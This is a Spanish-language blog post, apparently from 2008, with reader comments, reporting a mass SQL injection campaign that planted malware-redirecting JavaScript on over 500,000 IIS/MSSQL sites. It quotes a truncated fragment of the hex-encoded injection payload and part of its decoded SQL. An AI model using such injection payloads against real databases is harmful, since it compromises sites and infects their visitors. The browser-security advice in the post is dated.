Más de 500.000 sitios web comprometidos para infectar con malware a sus visitantes
Cientos de miles de sitios web que utilizan Microsoft IIS y MSSQL Server como sus motores fueron atacados mediante un ataque de inyección SQL, para poder incluir código javascript que redireccionara a sus visitantes a sitios maliciosos donde se prueban todo tipo de vulnerabilidades para lograr instalar malware en las computadoras de estos. Según F-Secure, una búsqueda listando cadenas específicas de la infección arroja más de 510.000 sitios afectados:
El ataque a los servidores MSSQL se logró inyectando una serie de sentencias en su mayoría codificadas en hexadecimal, que comienzan así:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006...
Y traducido a texto sería lo siguiente:
DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b...
Entre los sitios afectados se encuentran muchos de renombre como la UNICEF o las Naciones Unidas, así como de múltiples compañías serias y confiables, por lo que cualquier visitante está expuesto hasta que el código malicioso sea removido de todos los sitios.
Como usuarios, la única defensa posible es en primer lugar, no utilizar Internet Explorer, al cual van dirigidos la mayoría de los ataques; en segundo, usar Opera (deshabilitando plugins y, si se quiere aún más seguridad también los scripts por defecto) o Firefox con la extensión NoScript.
Vía Kriptópolis, F-Secure, The Hacker Webzine.
Entradas que (tal vez) tienen algo que ver:
No es la primera vez que ocurre, pero esta vez es masivo. En otra oleada de ataques masivos de ...
Asoma una nueva compañía que brinda un servicio en la misma línea de productos como SiteAdvisor ...
Si pretendemos usar esto de "la interné" sí que cada vez lo tenemos má ...
Seguramente muchos ya están al tanto de la noticia, se trata de una amenaza que viene bajo ...
El autor de The Hacker Webzine, Ronald van den Heetkamp, demuestra una vez más su predilec ...
gris en 
SpamLoco en 
Guxtabo en 
Juan Pablo en 
lucho en
abril 26th, 2008 at 23:27
Si bien es cierto que la mayoría de los sitios atacados corren IIS y MSSQL, no es una vulnerabilidad de estos lo que utilizan para el ataque (lo aclaran en F-Secure) sino una vulnerabilidad de los propramadores que no toman las precauciones pertinentes cuando validan lo que ingresan los usuarios en los formularios en sus sitios. Este mismo ataque puede dirigirse a cualquier motor de base de datos. Es cierto que es un poco más facil atacar un MSSQL porque permite encadenamiento de sentencias separadas por;.
Lo que me molesta y mucho es la forma en presentan la misma noticia en Kriptópolis.
Usando
abril 27th, 2008 at 15:30
En este comentario de Kriptópilos lo explican bastante bien. De todas formas me quedo la máxima del que le sigue:
“Es que no puede ser que me paguen 30 Euros y encima querrais una página web segura contra cualquier ataque”
Usando